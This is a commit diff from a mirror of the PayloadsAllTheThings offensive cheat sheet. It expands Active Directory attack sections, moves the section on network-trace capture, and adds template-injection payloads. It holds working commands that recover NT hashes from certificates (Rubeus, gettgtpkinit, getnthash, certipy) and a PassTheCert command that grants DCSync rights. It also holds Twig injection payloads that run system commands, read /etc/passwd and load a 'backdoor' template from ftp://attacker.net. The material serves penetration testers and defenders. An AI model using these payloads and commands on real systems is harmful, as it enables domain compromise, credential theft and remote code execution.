mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-24 05:15:26 +00:00
Capture a network trace with builtin tools
This commit is contained in:
parent
55e05b4b17
commit
6650c361e7
@ -62,7 +62,6 @@
|
|||||||
- [OverPass-the-Hash (pass the key)](#overpass-the-hash-pass-the-key)
|
- [OverPass-the-Hash (pass the key)](#overpass-the-hash-pass-the-key)
|
||||||
- [Using impacket](#using-impacket)
|
- [Using impacket](#using-impacket)
|
||||||
- [Using Rubeus](#using-rubeus)
|
- [Using Rubeus](#using-rubeus)
|
||||||
- [UnPAC The Hash](#unpac-the-hash)
|
|
||||||
- [Capturing and cracking Net-NTLMv1/NTLMv1 hashes](#capturing-and-cracking-net-ntlmv1ntlmv1-hashes)
|
- [Capturing and cracking Net-NTLMv1/NTLMv1 hashes](#capturing-and-cracking-net-ntlmv1ntlmv1-hashes)
|
||||||
- [Capturing and cracking Net-NTLMv2/NTLMv2 hashes](#capturing-and-cracking-net-ntlmv2ntlmv2-hashes)
|
- [Capturing and cracking Net-NTLMv2/NTLMv2 hashes](#capturing-and-cracking-net-ntlmv2ntlmv2-hashes)
|
||||||
- [Man-in-the-Middle attacks & relaying](#man-in-the-middle-attacks--relaying)
|
- [Man-in-the-Middle attacks & relaying](#man-in-the-middle-attacks--relaying)
|
||||||
@ -84,6 +83,7 @@
|
|||||||
- [ESC8 - AD CS Relay Attack](#esc8---ad-cs-relay-attack)
|
- [ESC8 - AD CS Relay Attack](#esc8---ad-cs-relay-attack)
|
||||||
- [Certifried CVE-2022-26923](#certifried-cve-2022-26923)
|
- [Certifried CVE-2022-26923](#certifried-cve-2022-26923)
|
||||||
- [Pass-The-Certificate](#pass-the-certificate)
|
- [Pass-The-Certificate](#pass-the-certificate)
|
||||||
|
- [UnPAC The Hash](#unpac-the-hash)
|
||||||
- [Shadow Credentials](#shadow-credentials)
|
- [Shadow Credentials](#shadow-credentials)
|
||||||
- [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
|
- [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
|
||||||
- [Abusing DNS Admins Group](#abusing-dns-admins-group)
|
- [Abusing DNS Admins Group](#abusing-dns-admins-group)
|
||||||
@ -1915,21 +1915,6 @@ root@kali:~$ klist
|
|||||||
.\Rubeus.exe asktgt /user:Administrator /rc4:[NTLMHASH] /createnetonly:C:\Windows\System32\cmd.exe
|
.\Rubeus.exe asktgt /user:Administrator /rc4:[NTLMHASH] /createnetonly:C:\Windows\System32\cmd.exe
|
||||||
```
|
```
|
||||||
|
|
||||||
### UnPAC The Hash
|
|
||||||
|
|
||||||
* Windows
|
|
||||||
```ps1
|
|
||||||
# request a ticket using a certificate and use /getcredentials to retrieve the NT hash in the PAC.
|
|
||||||
C:/> Rubeus.exe asktgt /getcredentials /user:"TARGET_SAMNAME" /certificate:"BASE64_CERTIFICATE" /password:"CERTIFICATE_PASSWORD" /domain:"FQDN_DOMAIN" /dc:"DOMAIN_CONTROLLER" /show
|
|
||||||
```
|
|
||||||
* Linux
|
|
||||||
```ps1
|
|
||||||
# obtain a TGT by validating a PKINIT pre-authentication
|
|
||||||
$ gettgtpkinit.py -cert-pfx "PATH_TO_CERTIFICATE" -pfx-pass "CERTIFICATE_PASSWORD" "FQDN_DOMAIN/TARGET_SAMNAME" "TGT_CCACHE_FILE"
|
|
||||||
|
|
||||||
# use the session key to recover the NT hash
|
|
||||||
$ export KRB5CCNAME="TGT_CCACHE_FILE" getnthash.py -key 'AS-REP encryption key' 'FQDN_DOMAIN'/'TARGET_SAMNAME'
|
|
||||||
```
|
|
||||||
|
|
||||||
### Capturing and cracking Net-NTLMv1/NTLMv1 hashes
|
### Capturing and cracking Net-NTLMv1/NTLMv1 hashes
|
||||||
|
|
||||||
@ -2516,6 +2501,8 @@ Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101
|
|||||||
|
|
||||||
#### Pass-The-Certificate
|
#### Pass-The-Certificate
|
||||||
|
|
||||||
|
> Pass the Certificate in order to get a TGT, this technique is used in "UnPAC the Hash" and "Shadow Credential"
|
||||||
|
|
||||||
* Windows
|
* Windows
|
||||||
```ps1
|
```ps1
|
||||||
# Information about a cert file
|
# Information about a cert file
|
||||||
@ -2523,6 +2510,11 @@ Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101
|
|||||||
|
|
||||||
# From a Base64 PFX
|
# From a Base64 PFX
|
||||||
Rubeus.exe asktgt /user:"TARGET_SAMNAME" /certificate:cert.pfx /password:"CERTIFICATE_PASSWORD" /domain:"FQDN_DOMAIN" /dc:"DOMAIN_CONTROLLER" /show
|
Rubeus.exe asktgt /user:"TARGET_SAMNAME" /certificate:cert.pfx /password:"CERTIFICATE_PASSWORD" /domain:"FQDN_DOMAIN" /dc:"DOMAIN_CONTROLLER" /show
|
||||||
|
|
||||||
|
# Grant DCSync rights to an user
|
||||||
|
./PassTheCert.exe --server dc.domain.local --cert-path C:\cert.pfx --elevate --target "DC=domain,DC=local" --sid <user_SID>
|
||||||
|
# To restore
|
||||||
|
./PassTheCert.exe --server dc.domain.local --cert-path C:\cert.pfx --elevate --target "DC=domain,DC=local" --restore restoration_file.txt
|
||||||
```
|
```
|
||||||
* Linux
|
* Linux
|
||||||
```ps1
|
```ps1
|
||||||
@ -2534,6 +2526,28 @@ Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101
|
|||||||
|
|
||||||
# PFX certificate (file) + password (string, optionnal)
|
# PFX certificate (file) + password (string, optionnal)
|
||||||
gettgtpkinit.py -cert-pfx "PATH_TO_PFX_CERT" -pfx-pass "CERT_PASSWORD" "FQDN_DOMAIN/TARGET_SAMNAME" "TGT_CCACHE_FILE"
|
gettgtpkinit.py -cert-pfx "PATH_TO_PFX_CERT" -pfx-pass "CERT_PASSWORD" "FQDN_DOMAIN/TARGET_SAMNAME" "TGT_CCACHE_FILE"
|
||||||
|
|
||||||
|
# Using Certipy
|
||||||
|
certipy auth -pfx "PATH_TO_PFX_CERT" -dc-ip 'dc-ip' -username 'user' -domain 'domain'
|
||||||
|
certipy cert -export -pfx "PATH_TO_PFX_CERT" -password "CERT_PASSWORD" -out "unprotected.pfx"
|
||||||
|
```
|
||||||
|
|
||||||
|
### UnPAC The Hash
|
||||||
|
|
||||||
|
Using the **UnPAC The Hash** method, you can retrieve the NT Hash for an User via its certificate.
|
||||||
|
|
||||||
|
* Windows
|
||||||
|
```ps1
|
||||||
|
# Request a ticket using a certificate and use /getcredentials to retrieve the NT hash in the PAC.
|
||||||
|
Rubeus.exe asktgt /getcredentials /user:"TARGET_SAMNAME" /certificate:"BASE64_CERTIFICATE" /password:"CERTIFICATE_PASSWORD" /domain:"FQDN_DOMAIN" /dc:"DOMAIN_CONTROLLER" /show
|
||||||
|
```
|
||||||
|
* Linux
|
||||||
|
```ps1
|
||||||
|
# Obtain a TGT by validating a PKINIT pre-authentication
|
||||||
|
$ gettgtpkinit.py -cert-pfx "PATH_TO_CERTIFICATE" -pfx-pass "CERTIFICATE_PASSWORD" "FQDN_DOMAIN/TARGET_SAMNAME" "TGT_CCACHE_FILE"
|
||||||
|
|
||||||
|
# Use the session key to recover the NT hash
|
||||||
|
$ export KRB5CCNAME="TGT_CCACHE_FILE" getnthash.py -key 'AS-REP encryption key' 'FQDN_DOMAIN'/'TARGET_SAMNAME'
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
|
@ -20,6 +20,7 @@
|
|||||||
* [RevSocks](#revsocks)
|
* [RevSocks](#revsocks)
|
||||||
* [plink](#plink)
|
* [plink](#plink)
|
||||||
* [ngrok](#ngrok)
|
* [ngrok](#ngrok)
|
||||||
|
* [Capture a network trace with builtin tools](#capture-a-network-trace-with-builtin-tools)
|
||||||
* [Basic Pivoting Types](#basic-pivoting-types)
|
* [Basic Pivoting Types](#basic-pivoting-types)
|
||||||
* [Listen - Listen](#listen---listen)
|
* [Listen - Listen](#listen---listen)
|
||||||
* [Listen - Connect](#listen---connect)
|
* [Listen - Connect](#listen---connect)
|
||||||
@ -411,6 +412,38 @@ tar xvzf cloudflared-stable-linux-amd64.tgz
|
|||||||
./cloudflared tunnel --url <protocol>://<host>:<port>
|
./cloudflared tunnel --url <protocol>://<host>:<port>
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## Capture a network trace with builtin tools
|
||||||
|
|
||||||
|
* Windows (netsh)
|
||||||
|
```ps1
|
||||||
|
# start a capture use the netsh command.
|
||||||
|
netsh trace start capture=yes report=disabled tracefile=c:\trace.etl maxsize=16384
|
||||||
|
|
||||||
|
# stop the trace
|
||||||
|
netsh trace stop
|
||||||
|
|
||||||
|
# Event tracing can be also used across a reboots
|
||||||
|
netsh trace start capture=yes report=disabled persistent=yes tracefile=c:\trace.etl maxsize=16384
|
||||||
|
|
||||||
|
# To open the file in Wireshark you have to convert the etl file to the cap file format. Microsoft has written a convert for this task. Download the latest version.
|
||||||
|
etl2pcapng.exe c:\trace.etl c:\trace.pcapng
|
||||||
|
|
||||||
|
# Use filters
|
||||||
|
netsh trace start capture=yes report=disabled Ethernet.Type=IPv4 IPv4.Address=10.200.200.3 tracefile=c:\trace.etl maxsize=16384
|
||||||
|
```
|
||||||
|
* Linux (tcpdump)
|
||||||
|
```ps1
|
||||||
|
sudo apt-get install tcpdump
|
||||||
|
tcpdump -w 0001.pcap -i eth0
|
||||||
|
tcpdump -A -i eth0
|
||||||
|
|
||||||
|
# capture every TCP packet
|
||||||
|
tcpdump -i eth0 tcp
|
||||||
|
|
||||||
|
# capture everything on port 22
|
||||||
|
tcpdump -i eth0 port 22
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
## Basic Pivoting Types
|
## Basic Pivoting Types
|
||||||
|
|
||||||
@ -456,3 +489,4 @@ tar xvzf cloudflared-stable-linux-amd64.tgz
|
|||||||
* 🇫🇷 [Etat de l’art du pivoting réseau en 2019 - Oct 28,2019 - Alexandre ZANNI](https://cyberdefense.orange.com/fr/blog/etat-de-lart-du-pivoting-reseau-en-2019/) - 🇺🇸 [Overview of network pivoting and tunneling [2022 updated] - Alexandre ZANNI](https://blog.raw.pm/en/state-of-the-art-of-network-pivoting-in-2019/)
|
* 🇫🇷 [Etat de l’art du pivoting réseau en 2019 - Oct 28,2019 - Alexandre ZANNI](https://cyberdefense.orange.com/fr/blog/etat-de-lart-du-pivoting-reseau-en-2019/) - 🇺🇸 [Overview of network pivoting and tunneling [2022 updated] - Alexandre ZANNI](https://blog.raw.pm/en/state-of-the-art-of-network-pivoting-in-2019/)
|
||||||
* [Red Team: Using SharpChisel to exfil internal network - Shantanu Khandelwal - Jun 8](https://medium.com/@shantanukhande/red-team-using-sharpchisel-to-exfil-internal-network-e1b07ed9b49)
|
* [Red Team: Using SharpChisel to exfil internal network - Shantanu Khandelwal - Jun 8](https://medium.com/@shantanukhande/red-team-using-sharpchisel-to-exfil-internal-network-e1b07ed9b49)
|
||||||
* [Active Directory - hideandsec](https://hideandsec.sh/books/cheatsheets-82c/page/active-directory)
|
* [Active Directory - hideandsec](https://hideandsec.sh/books/cheatsheets-82c/page/active-directory)
|
||||||
|
* [Windows: Capture a network trace with builtin tools (netsh) - February 22, 2021 Michael Albert](https://michlstechblog.info/blog/windows-capture-a-network-trace-with-builtin-tools-netsh/)
|
@ -829,6 +829,9 @@ $output = $twig > render (
|
|||||||
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
|
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
|
||||||
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
|
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
|
||||||
{{['id']|filter('system')}}
|
{{['id']|filter('system')}}
|
||||||
|
{{[0]|reduce('system','id')}}
|
||||||
|
{{['id']|map('system')|join}}
|
||||||
|
{{['id',1]|sort('system')|join}}
|
||||||
{{['cat\x20/etc/passwd']|filter('system')}}
|
{{['cat\x20/etc/passwd']|filter('system')}}
|
||||||
{{['cat$IFS/etc/passwd']|filter('system')}}
|
{{['cat$IFS/etc/passwd']|filter('system')}}
|
||||||
```
|
```
|
||||||
|
Loading…
Reference in New Issue
Block a user